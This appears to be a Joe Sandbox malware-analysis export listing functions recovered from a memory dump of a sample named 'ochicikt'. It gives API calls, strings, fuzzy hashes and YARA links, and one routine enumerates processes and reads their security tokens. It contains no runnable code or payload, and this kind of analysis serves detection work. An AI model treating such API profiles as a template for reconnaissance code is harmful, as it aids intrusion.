Source File: 0000001B.00000002.1919953866.00007FF741A41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF741A40000, based on PE: true

Associated: 0000001B.00000002.1919924630.00007FF741A40000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920049989.00007FF741B15000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920120727.00007FF741B70000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920151052.00007FF741B72000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920180659.00007FF741B75000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920209968.00007FF741B78000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff741a40000_ochicikt.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy
String ID: parse_error
API String ID: 1944019136-3903021949
Opcode ID: 0883b7d5183e5eec2c29adc72ccb7099fca8371d4a5a4f7c326bcd5365f69bfb
Instruction ID: 371223dffa5e64db6cf11776ff6a31cc7a9e4555b4284538c8c5857b758368a6
Opcode Fuzzy Hash: 0883b7d5183e5eec2c29adc72ccb7099fca8371d4a5a4f7c326bcd5365f69bfb
Instruction Fuzzy Hash: 8FA1E462F18B81C5FB12FB64D8407BDA321EB45398F505632EAAC16A99EFB8D180C350

Function 00007FF741AE8C04 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF741AD9EEC: GetLastError.KERNEL32 ref: 00007FF741AD9EFB
Part of subcall function 00007FF741AD9EEC: FlsGetValue.KERNEL32 ref: 00007FF741AD9F10
Part of subcall function 00007FF741AD9EEC: SetLastError.KERNEL32 ref: 00007FF741AD9F9B

TranslateName.LIBCMT ref: 00007FF741AE8C6E
TranslateName.LIBCMT ref: 00007FF741AE8CA9
GetACP.KERNEL32 ref: 00007FF741AE8CF0
IsValidCodePage.KERNEL32 ref: 00007FF741AE8D28
GetLocaleInfoW.KERNEL32 ref: 00007FF741AE8EE5

Strings

utf8, xrefs: 00007FF741AE8E0C

Memory Dump Source

Source File: 0000001B.00000002.1919953866.00007FF741A41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF741A40000, based on PE: true

Associated: 0000001B.00000002.1919924630.00007FF741A40000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920049989.00007FF741B15000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920120727.00007FF741B70000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920151052.00007FF741B72000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920180659.00007FF741B75000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920209968.00007FF741B78000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff741a40000_ochicikt.jbxd

Similarity

API ID: ErrorLastNameTranslate$CodeInfoLocalePageValidValue
String ID: utf8
API String ID: 3069159798-905460609
Opcode ID: 41343eb44851c0e8f8055f3926715ba520ae6846787d1c3cb08d70e80e5c003e
Instruction ID: 49a21545a4cfb3d259975dc3dbfa622cd21a6c81aee0c958704408becaffa0be
Opcode Fuzzy Hash: 41343eb44851c0e8f8055f3926715ba520ae6846787d1c3cb08d70e80e5c003e
Instruction Fuzzy Hash: C9919F32B8C742C5EB66BB21D440AB9A3A5FB44B80F858132DA5C47785DFBCE951C732

Function 00007FF741AFB170 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32(?,?,?,?,?,?,00000000,00007FF741A6C419), ref: 00007FF741AFB196
FormatMessageA.KERNEL32 ref: 00007FF741AFB1C9

Strings

!x-sys-default-locale, xrefs: 00007FF741AFB189

Memory Dump Source

Source File: 0000001B.00000002.1919953866.00007FF741A41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF741A40000, based on PE: true

Associated: 0000001B.00000002.1919924630.00007FF741A40000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920049989.00007FF741B15000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920120727.00007FF741B70000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920151052.00007FF741B72000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920180659.00007FF741B75000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920209968.00007FF741B78000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff741a40000_ochicikt.jbxd

Similarity

API ID: FormatInfoLocaleMessage
String ID: !x-sys-default-locale
API String ID: 4235545615-2729719199
Opcode ID: e9313e5009c165bfc27bb14f9f63cf4f23352891cc12b2974ad7925588fd8796
Instruction ID: 3c43d34ecd98755e34786832fc2ca572d6fc4eb9f4df3dea5db751e9a0fb6bd8
Opcode Fuzzy Hash: e9313e5009c165bfc27bb14f9f63cf4f23352891cc12b2974ad7925588fd8796
Instruction Fuzzy Hash: 29018472B1C786C2F712BB12F844B6AA7A6F7857C4F848036DA4946A98CF7CD505C728

Function 00007FF741A97C00 Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 202COMMON

Download Yara Rule

Strings

unexpected '}', xrefs: 00007FF741A99413
key opened, but never closed, xrefs: 00007FF741A993BF
quote was opened but not closed., xrefs: 00007FF741A99236, 00007FF741A992AB
word wasnt properly ended, xrefs: 00007FF741A99365, 00007FF741A993EC
unexpected key without object, xrefs: 00007FF741A992EA
object is not closed with '}', xrefs: 00007FF741A9920F
key declared, but no value, xrefs: 00007FF741A9925D, 00007FF741A99284, 00007FF741A99398
No closed word, xrefs: 00007FF741A99317, 00007FF741A9933E

Memory Dump Source

Source File: 0000001B.00000002.1919953866.00007FF741A41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF741A40000, based on PE: true

Associated: 0000001B.00000002.1919924630.00007FF741A40000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920049989.00007FF741B15000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920120727.00007FF741B70000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920151052.00007FF741B72000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920180659.00007FF741B75000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920209968.00007FF741B78000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff741a40000_ochicikt.jbxd

Similarity

API ID:
String ID: No closed word$key declared, but no value$key opened, but never closed$object is not closed with '}'$quote was opened but not closed.$unexpected '}'$unexpected key without object$word wasnt properly ended
API String ID: 0-2700065129
Opcode ID: 43689379942712992e6e430a8e6e874471862eabb8977b591f79ba013a45cb83
Instruction ID: 933e4dc637685334a6073ab24ee8217b3254f53fa0a002769cee3d1f1a3ca4fc
Opcode Fuzzy Hash: 43689379942712992e6e430a8e6e874471862eabb8977b591f79ba013a45cb83
Instruction Fuzzy Hash: 89B14F72A0DBC6D5EB62FF20DC90AE8B365EB54348FC05133D64C069A5DFB89689C320

Function 00007FF741AB4A30 Relevance: 28.7, APIs: 19, Instructions: 177
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF741AB4A86
Process32FirstW.KERNEL32 ref: 00007FF741AB4ACA
Process32NextW.KERNEL32 ref: 00007FF741AB4ADF
OpenProcess.KERNEL32 ref: 00007FF741AB4B1B
OpenProcessToken.ADVAPI32 ref: 00007FF741AB4B42
GetTokenInformation.ADVAPI32 ref: 00007FF741AB4B6E
GetLastError.KERNEL32 ref: 00007FF741AB4B7C
GetTokenInformation.ADVAPI32 ref: 00007FF741AB4BBC
ConvertSidToStringSidA.ADVAPI32 ref: 00007FF741AB4BD3
CloseHandle.KERNEL32 ref: 00007FF741AB4C46
CloseHandle.KERNEL32 ref: 00007FF741AB4C51
CloseHandle.KERNEL32 ref: 00007FF741AB4CB6
Process32NextW.KERNEL32 ref: 00007FF741AB4CC3
CloseHandle.KERNEL32 ref: 00007FF741AB4CE9
CloseHandle.KERNEL32 ref: 00007FF741AB4CF2
CloseHandle.KERNEL32 ref: 00007FF741AB4D07

Memory Dump Source

Source File: 0000001B.00000002.1919953866.00007FF741A41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF741A40000, based on PE: true

Associated: 0000001B.00000002.1919924630.00007FF741A40000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920049989.00007FF741B15000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920120727.00007FF741B70000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920151052.00007FF741B72000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920180659.00007FF741B75000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920209968.00007FF741B78000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff741a40000_ochicikt.jbxd

Similarity

API ID: CloseHandle$Process32Token$InformationNextOpenProcess$ConvertCreateErrorFirstLastSnapshotStringToolhelp32
String ID:
API String ID: 3925315391-0
Opcode ID: 3077f5b99db137bf022680ec74de79b9919307a9f0301f7f5e0e032906a15565
Instruction ID: 475936da23776ad6737d18a3a7becf044d627d8d729cf7c3bde6b3421c3bd52e
Opcode Fuzzy Hash: 3077f5b99db137bf022680ec74de79b9919307a9f0301f7f5e0e032906a15565
Instruction Fuzzy Hash: A081392171CB81C2EB52FB56E84467AA3A5FB89B84F815035EE4E47B58DFBCE404C720

Function 00007FF741A6DCE0 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 281COMMON

Download Yara Rule

APIs

__std_fs_code_page.LIBCPMT ref: 00007FF741A6DD3F

Part of subcall function 00007FF741AFB260: AreFileApisANSI.KERNEL32(?,?,?,?,00007FF741A95C46,?,?,00000000,0000023773C01EF0,?,00000000,?,00007FF741A7786D), ref: 00007FF741AFB272

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741A6DF52
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741A6DF58
__std_exception_destroy.LIBVCRUNTIME ref: 00007FF741A6DFE7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741A6E00D
__std_exception_destroy.LIBVCRUNTIME ref: 00007FF741A6E0A1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741A6E0AD

Strings

", ", xrefs: 00007FF741A6DE2D
: ", xrefs: 00007FF741A6DDFA

Memory Dump Source

Source File: 0000001B.00000002.1919953866.00007FF741A41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF741A40000, based on PE: true

Associated: 0000001B.00000002.1919924630.00007FF741A40000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920049989.00007FF741B15000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920120727.00007FF741B70000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920151052.00007FF741B72000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920180659.00007FF741B75000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920209968.00007FF741B78000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff741a40000_ochicikt.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_exception_destroy$ApisFile__std_fs_code_page
String ID: ", "$: "
API String ID: 1991941009-747220369
Opcode ID: e5bf5c88b0fcd7627ae5fdfc05b90dafb50ef9643e5e9f1e50cb46f90978a519
Instruction ID: c57e946b4073bb68d591c4c1c719f2b719cbb890785764514a6b000248a6cf45
Opcode Fuzzy Hash: e5bf5c88b0fcd7627ae5fdfc05b90dafb50ef9643e5e9f1e50cb46f90978a519
Instruction Fuzzy Hash: F7B1AF72B08A41C5EB01FF65D4407BCA361EB54B88F808532DE9D17B99DFB8D495C3A0

Function 00007FF741A89990 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 237COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF741A89A00
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF741A89A48
_Getcoll.LIBCPMT ref: 00007FF741A89A7C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741A89B7B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741A89BF6

Strings

bad locale name, xrefs: 00007FF741A89B81

Memory Dump Source

Source File: 0000001B.00000002.1919953866.00007FF741A41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF741A40000, based on PE: true

Associated: 0000001B.00000002.1919924630.00007FF741A40000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920049989.00007FF741B15000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920120727.00007FF741B70000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920151052.00007FF741B72000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920180659.00007FF741B75000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920209968.00007FF741B78000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff741a40000_ochicikt.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturnstd::_$GetcollLocinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 2486341784-1405518554
Opcode ID: 89fd462909fe8406f0b7eb222e9b108a1223c9a6c56a5d15dfce7387ec176629
Instruction ID: 113a8dccd4aeadfe81e1c0932403f839bd41fb4e980233781667b2ed98118630
Opcode Fuzzy Hash: 89fd462909fe8406f0b7eb222e9b108a1223c9a6c56a5d15dfce7387ec176629
Instruction Fuzzy Hash: E691A022B09B81CAEB16FFB5E4407ACB362EF84788F844136DA5D17E89DE78D451C364

Function 00007FF741AE092C Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF741AE0D59

Memory Dump Source

Source File: 0000001B.00000002.1919953866.00007FF741A41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF741A40000, based on PE: true

Associated: 0000001B.00000002.1919924630.00007FF741A40000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920049989.00007FF741B15000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920120727.00007FF741B70000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920151052.00007FF741B72000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920180659.00007FF741B75000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920209968.00007FF741B78000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff741a40000_ochicikt.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 8d4d1184268d38eb40f1b2f8de77a3be335aedca5c603a4bb4196d88dea7cd4c
Instruction ID: 6658f7ced427e5b3f95b50c49ec8fce0c95282663cd1c2b88e8a6f8140b5f4db
Opcode Fuzzy Hash: 8d4d1184268d38eb40f1b2f8de77a3be335aedca5c603a4bb4196d88dea7cd4c
Instruction Fuzzy Hash: CEC1D122B4CB86D1EB62BB159540ABDAB51FB81B80FD68132DA5D07B91CEFCE455C330

Function 00007FF741A99970 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 172COMMON

Download Yara Rule

APIs

__std_exception_copy.LIBVCRUNTIME ref: 00007FF741A99B53
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741A99BDD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741A99BE3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741A99BE9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741A99BEF

Strings

out_of_range, xrefs: 00007FF741A999E2

Memory Dump Source

Source File: 0000001B.00000002.1919953866.00007FF741A41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF741A40000, based on PE: true

Associated: 0000001B.00000002.1919924630.00007FF741A40000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920049989.00007FF741B15000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920120727.00007FF741B70000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920151052.00007FF741B72000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920180659.00007FF741B75000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920209968.00007FF741B78000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff741a40000_ochicikt.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy
String ID: out_of_range
API String ID: 1944019136-3053435996
Opcode ID: 874f3cd19daa1b4acb793e190c47080266ac7246d13e32edc54e0ed3feb9914e
Instruction ID: 150a308ae2a7cf6e8306a4ec99c3a23da6f5a504959fd163274c0a19b7525eda
Opcode Fuzzy Hash: 874f3cd19daa1b4acb793e190c47080266ac7246d13e32edc54e0ed3feb9914e
Instruction Fuzzy Hash: 5471B562F5CB81D8FB01FF75D4407AC6361EB55398F809632EA6C16AD9EEBC9185C320

Function 00007FF741A87AC0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 169COMMON

Download Yara Rule

APIs

__std_exception_copy.LIBVCRUNTIME ref: 00007FF741A87C9F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741A87D24
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741A87D2A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741A87D30
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741A87D36

Strings

type_error, xrefs: 00007FF741A87B34

Memory Dump Source

Source File: 0000001B.00000002.1919953866.00007FF741A41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF741A40000, based on PE: true

Associated: 0000001B.00000002.1919924630.00007FF741A40000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920049989.00007FF741B15000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920120727.00007FF741B70000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920151052.00007FF741B72000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920180659.00007FF741B75000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920209968.00007FF741B78000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff741a40000_ochicikt.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy
String ID: type_error
API String ID: 1944019136-1406221190
Opcode ID: 4fcb7e109cb8679aad047173b5e2ee1f9df747f7d21fe72c782abaca6ed94bf7
Instruction ID: d4162faa971f608ba84b48cc669b45cddf82ac93aa9b247506508b500a6dadc9
Opcode Fuzzy Hash: 4fcb7e109cb8679aad047173b5e2ee1f9df747f7d21fe72c782abaca6ed94bf7
Instruction Fuzzy Hash: F371B663F5DB41C8FB02FF75D4507ACA321AB45398F409632DE6C16AD9EEB89185C360

Function 00007FF741A9CB00 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 168COMMON

Download Yara Rule

APIs

__std_exception_copy.LIBVCRUNTIME ref: 00007FF741A9CCDF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741A9CD64
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741A9CD6A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741A9CD70
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741A9CD76

Strings

invalid_iterator, xrefs: 00007FF741A9CB74

Memory Dump Source

Source File: 0000001B.00000002.1919953866.00007FF741A41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF741A40000, based on PE: true

Associated: 0000001B.00000002.1919924630.00007FF741A40000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920049989.00007FF741B15000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920120727.00007FF741B70000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920151052.00007FF741B72000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920180659.00007FF741B75000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920209968.00007FF741B78000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff741a40000_ochicikt.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy
String ID: invalid_iterator
API String ID: 1944019136-2508626007
Opcode ID: db64a41e33655d8f7984c60c29de06ce032e72b96d3b637e1c5bbf999e8fc4b6
Instruction ID: 45f958e9cf53d38e9ac78d95450b505ef64d8d18d1659e80b5069741e59f4875
Opcode Fuzzy Hash: db64a41e33655d8f7984c60c29de06ce032e72b96d3b637e1c5bbf999e8fc4b6
Instruction Fuzzy Hash: 6B71B663F5DB81C4FB02FF74D8507AC6321AB45798F809632DE6C16AD9EE789185C360

Function 00007FF741AFD42C Relevance: 9.2, APIs: 6, Instructions: 239COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32 ref: 00007FF741AFD4D9
MultiByteToWideChar.KERNEL32 ref: 00007FF741AFD575
MultiByteToWideChar.KERNEL32 ref: 00007FF741AFD61E
MultiByteToWideChar.KERNEL32 ref: 00007FF741AFD648
MultiByteToWideChar.KERNEL32 ref: 00007FF741AFD6F0
CompareStringEx.KERNEL32 ref: 00007FF741AFD73D

Memory Dump Source

Source File: 0000001B.00000002.1919953866.00007FF741A41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF741A40000, based on PE: true

Associated: 0000001B.00000002.1919924630.00007FF741A40000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920049989.00007FF741B15000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920120727.00007FF741B70000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920151052.00007FF741B72000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920180659.00007FF741B75000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920209968.00007FF741B78000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff741a40000_ochicikt.jbxd

Similarity

API ID: ByteCharMultiWide$CompareInfoString
String ID:
API String ID: 2984826149-0
Opcode ID: 987a4f10aa317a0612ff18b9eb99ef21b110713cbd8d9b27a69a50aa41181d96
Instruction ID: f763806c521d186ff28ae7a0da59f3a43d34c2a5a8519d4414a10cb8a90821e5
Opcode Fuzzy Hash: 987a4f10aa317a0612ff18b9eb99ef21b110713cbd8d9b27a69a50aa41181d96
Instruction Fuzzy Hash: D8A18262B0D782C6EB23BB259454BB9E791AF41798F844633DA5D0B6C5EFBCE4448330

Function 00007FF741A76490 Relevance: 7.8, APIs: 5, Instructions: 312COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741A76922
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741A76928
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741A7692E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741A76934
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741A7693A

Memory Dump Source

Source File: 0000001B.00000002.1919953866.00007FF741A41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF741A40000, based on PE: true

Associated: 0000001B.00000002.1919924630.00007FF741A40000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920049989.00007FF741B15000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920120727.00007FF741B70000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920151052.00007FF741B72000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920180659.00007FF741B75000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920209968.00007FF741B78000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff741a40000_ochicikt.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 8516823718b31d65046f5f1c2598e59c4a88abc6e9ddcf8615bbf9ac0a79e7f7
Instruction ID: 2a2c9562d4e02c41628d7f5a94d0536f7b25d2ebef57f3b2d25920547693a90e
Opcode Fuzzy Hash: 8516823718b31d65046f5f1c2598e59c4a88abc6e9ddcf8615bbf9ac0a79e7f7
Instruction Fuzzy Hash: 3BD1B062F0CA81C5FB11BB65D4407ADA761EB457E8F940232EEAD17AD9DFB8D580C320

Function 00007FF741ACA260 Relevance: 7.6, APIs: 5, Instructions: 123COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00007FF741ACA280
FreeEnvironmentStringsW.KERNEL32 ref: 00007FF741ACA37B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741ACA3A5
RtlInitUnicodeString.NTDLL ref: 00007FF741ACA3EE
RtlInitUnicodeString.NTDLL ref: 00007FF741ACA3FB

Memory Dump Source

Source File: 0000001B.00000002.1919953866.00007FF741A41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF741A40000, based on PE: true

Associated: 0000001B.00000002.1919924630.00007FF741A40000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920049989.00007FF741B15000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920120727.00007FF741B70000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920151052.00007FF741B72000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920180659.00007FF741B75000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920209968.00007FF741B78000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff741a40000_ochicikt.jbxd

Similarity

API ID: EnvironmentInitStringStringsUnicode$Free_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1868271193-0
Opcode ID: 28c5e92557ea0f9629c31fc779ecd0cdb14558697c37b9678ad8433ecc491865
Instruction ID: 30a9b611556e7569a62eba45f504f8326a0731518e5c52a6b3426005ba58640e
Opcode Fuzzy Hash: 28c5e92557ea0f9629c31fc779ecd0cdb14558697c37b9678ad8433ecc491865
Instruction Fuzzy Hash: C6516D22A0CB81C2EB11BF15E44026DB761FB85B94F959222DB5D03B95EFB8E1D0C324

Function 00007FF741ADA12C Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF741AD7EF7,?,?,00000000,00007FF741AD8192,?,?,?,?,-2723E8D8DEBC5093,00007FF741AD811E), ref: 00007FF741ADA14B
FlsSetValue.KERNEL32(?,?,?,00007FF741AD7EF7,?,?,00000000,00007FF741AD8192,?,?,?,?,-2723E8D8DEBC5093,00007FF741AD811E), ref: 00007FF741ADA16A
FlsSetValue.KERNEL32(?,?,?,00007FF741AD7EF7,?,?,00000000,00007FF741AD8192,?,?,?,?,-2723E8D8DEBC5093,00007FF741AD811E), ref: 00007FF741ADA192
FlsSetValue.KERNEL32(?,?,?,00007FF741AD7EF7,?,?,00000000,00007FF741AD8192,?,?,?,?,-2723E8D8DEBC5093,00007FF741AD811E), ref: 00007FF741ADA1A3
FlsSetValue.KERNEL32(?,?,?,00007FF741AD7EF7,?,?,00000000,00007FF741AD8192,?,?,?,?,-2723E8D8DEBC5093,00007FF741AD811E), ref: 00007FF741ADA1B4

Memory Dump Source

Source File: 0000001B.00000002.1919953866.00007FF741A41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF741A40000, based on PE: true

Associated: 0000001B.00000002.1919924630.00007FF741A40000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920049989.00007FF741B15000.00000002.00000001.01000000.00000009.sdmpDownload File
